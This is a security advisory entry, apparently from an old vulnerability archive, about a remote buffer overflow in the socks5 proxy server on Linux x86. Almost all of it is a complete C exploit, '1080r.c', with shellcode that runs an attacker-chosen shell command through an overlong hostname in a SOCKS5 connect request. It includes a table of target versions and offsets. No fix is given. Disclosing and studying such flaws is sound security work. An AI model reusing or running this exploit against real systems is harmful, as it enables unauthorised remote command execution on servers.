COMMAND

    socks5

SYSTEMS AFFECTED

    socks5

PROBLEM

    '0days master' posted following.

    /*
    * !!!! Private do not distribute !!!!
    *
    * <1080r.c> socks5 remote exploit / linux x86
    *
    * Usage:
    * $ ./1080r <host> <command> [offset]
    *
    * Vulnerables:
    * socks5-v1.0r10 (compiled on a turbolinux 4.0.5) => 0
    * socks5-v1.0r9 (compiled on a turbolinux 4.0.5) => 0
    * socks5-v1.0r8 (compiled on a turbolinux 4.0.5) => 0
    * socks5-v1.0r10 (compiled on a redhat 6.0) => 400
    * socks5-s5watch-1.0r9-2 (redhat-contrib) => no?
    * socks5-0.17-1 (redhat 4.2) => no
    * socks5-1.0r10-5 (redhat-contrib) => no??
    * socks5-server-1.0r6-8TL (TurboContrib) => no??
    *
    * By: The Dark Raver of CPNE (Spain - 9/5/2000)
    *
    * <http://members.tripod.com/~ochodedos> - <doble@iname.com>
    *
    * "Pasaba arrolladora en su hermosura
    *  y el paso le dejé,
    *  ni aun mirarla me volví, y no obstante
    *  algo en mi oído murmuró, esa es..."
    *
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <signal.h>
    #include <unistd.h>
    #include <sys/time.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netinet/in_systm.h>
    #include <netinet/ip.h>
    #include <netdb.h>
    #include <arpa/inet.h>
    #include <arpa/nameser.h>
    
    #define NOP 0x90
    #define MAXLEN 2000
    #define OFFSET 0x7fffd99d // TurboLinux 4.0.5
    #define ALIGN 3
    #define LENGTH 195
    
    char hell[100]=
    "\xeb\x29" // jmp 0x13
    "\x5e" // popl %esi
    "\x89\x76\x30" // movl %esi,0x30(%esi)
    "\x89\xf0" // movl %esi,%eax
    "\x83\xc0\x08" // addl $0x8,%eax
    "\x89\x46\x34" // movl %eax,0x34(%esi)
    "\x83\xc0\x03" // addl $0x3,%eax
    "\x89\x46\x38" // movl %eax,0x38(%esi)
    "\x31\xc0" // xorl %eax,%eax
    "\x89\x46\x3c" // movl %eax,0x3c(%esi)
    "\x88\x46\x07" // movb %eax,0x7(%esi)
    "\x88\x46\x0a" // movb %eax,0xa(%esi)
    "\xb0\x0b" // movb $0xb,%al
    "\x89\xf3" // movl %esi,%ebx
    "\x8d\x4e\x30" // leal 0x30(%esi),%ecx
    "\x8d\x56\x3c" // leal 0x3c(%esi),%edx
    "\xcd\x80" // int $0x80
    "\xe8\xd2\xff\xff\xff" // call -0x22
    "/bin/shA"
    "-cA"
    "";
    
    
    char buf[MAXLEN];
    
    main(int argc, char *argv[]) {
    struct sockaddr_in to;
    char buff[1000];
    int sd;
    int pktlen;
    struct hostent *hp;
    int i;
    long *addr;
    int off;
    int alin;
    int len;
    int offset;
    
    if(argc==4) {
    offset=atoi(argv[3]);
    } else {
	    if(argc==3) {
	    offset=0;
	    } else {
		    printf("Uso: ./1080r <host> <command> [offset]\n");
		    exit(0); }
    }
    
    len=LENGTH;
    off=OFFSET+offset;
    alin=ALIGN;
    
    strcat(hell,argv[2]);
    strcat(hell,";");
    
    memset(buf,NOP,len);
    memcpy(buf+len-strlen(hell)-4,hell,strlen(hell));
    
    addr=(long *)(buf+alin);
    for (i=0;i<46;i+=4)
    *(addr++) = off;
    
    buf[len-1]='\0';
    
    to.sin_family=AF_INET;
    to.sin_port = htons(1080);
    
    if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
                    perror("gethostbyname()");
                    exit(0); }
    
    if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                    perror("socket()");
                    exit(0); }
    
    memcpy((char *)&to.sin_addr,(char *)hp->h_addr,hp->h_length);
    
    if(connect(sd,(struct sockaddr *)&to,sizeof(to))!=0) {
                    perror("connect()");
                    exit(0); }
    printf("Connect: Ready to send overflow...\n");
    //getchar();
    
    // inicio
    
    pktlen=3;
    buff[0]=0x5; // SOCKS version 5
    buff[1]=0x1; // one authentication type...
    
    buff[2]=0x0; // no authentication
    //buff[2]=0x2; // userpass
    
    if(write(sd, buff, pktlen)!=pktlen) {
    perror("write error");
    exit(-1); }
    
    if(read(sd, buff, 2)!=2) {
          perror("read error");
          exit(-1); }
    
    if(buff[0] != 0x5) {
          printf("invalid response\n");
          exit(-1); }
    
    if(buff[1] == 0xf) {
          printf("proxy requires authenticationn");
          exit(-1); }
    
    if(buff[1] != 0x0) {
          printf("proxy returned an invalid authentication type\n");
          exit(-1); }
    
    // autentificacion
    /*
    printf("done\n");
    printf("sending autentificacion request...");
    
    pktlen=snprintf(buff, sizeof(buff), "\x01%c%s%c%s",
	    strlen(username), username, strlen(password), password);
    
    send(sd, buff, pktlen, 0);
    
    recv(sd, buff, 2, 0);
    
    if(buff[1] != 0x00) {
	          printf("username/password invalid\n");
	          exit (1); }
    */
    // conexion
    
    for(i=1;i<=len;i++)
            putchar(buf[i]);
    
    printf("done\n");
    printf("sending connection request...");
    
    pktlen=snprintf(buff, sizeof(buff), "\x05\x01%c\x03%c%s%c%c",
	     0x00, strlen(buf), buf, 0x11, 0x22);
    
    if(write(sd, buff, pktlen)!=pktlen) {
	    perror("write error");
            exit(-1); }
    
    if(read(sd, buff, 4)!=4) {
          perror("read error (1)");
          exit(-1); }
    
        switch(buff[1]) {
        case 0: printf("succeeded\n"); break;
        case 1: printf("general SOCKS server failure\n"); exit(-1);
        case 2: printf("connection not allowed by ruleset\n"); exit(-1);
        case 3: printf("network unreachable\n"); exit(-1);
        case 4: printf("host unreachable\n"); exit(-1);
        case 5: printf("connection refused\n"); exit(-1);
        case 6: printf("TTL expired\n"); exit(-1);
        case 7: printf("command not supported (?)\n"); exit(-1);
        case 8: printf("address type not supported\n"); exit(-1);
        default: printf("returned unknown error code\n"); exit(-1);
        }
    
    }

SOLUTION

    Nothing yet.